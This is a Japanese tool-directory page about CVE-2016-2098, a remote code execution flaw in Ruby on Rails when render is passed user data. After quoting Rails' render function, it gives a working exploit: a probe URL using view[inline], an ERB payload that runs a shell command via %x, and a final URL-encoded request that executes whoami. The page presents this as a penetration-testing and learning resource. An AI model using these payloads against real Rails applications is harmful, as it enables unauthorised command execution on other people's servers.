Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/j4k0m/cve-2016-2098
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubj4k0m/cve-2016-2098

CVE-2016-2098

ユーザー提供データでrenderを使用する際のRuby on Railsにおけるリモートコード実行の脆弱性

リポジトリを見る
44年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2016-2098

レンダリングにユーザー提供データを使用する際のRuby-on-Railsにおけるリモートコード実行脆弱性。

説明:

この問題は、ユーザー提供データに対してrenderメソッドを使用することに起因します。

renderメソッドは通常、テンプレートからページをレンダリングするために使用されますが、renderメソッドはプレーンテキスト(plaintext)やインラインコード(inline)のレンダリングも開発者に許可します。

render関数:

root@kitploit:~
# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

エクスプロイト例:

ターゲットURL:

root@kitploit:~
http://example.com/?view=test

エクスプロイト:

root@kitploit:~
http://example.com/?view[inline]=OK

ソースコードに'OK'と表示されていれば、WebアプリケーションはCVE-2016-2098に対して脆弱です。

リモートコード実行

root@kitploit:~
<%= %x('[CMD]') %>

CMDを実行したいコマンドに置き換えます。

root@kitploit:~
<%= %x('whoami') %>

URLエンコード後:

root@kitploit:~
%3C%25=%20%25x(whoami)%20%25%3E

最終的なURL:

root@kitploit:~
http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

リソース:

  • https://guides.rubyonrails.org/layouts_and_rendering.html
ツールをダウンロード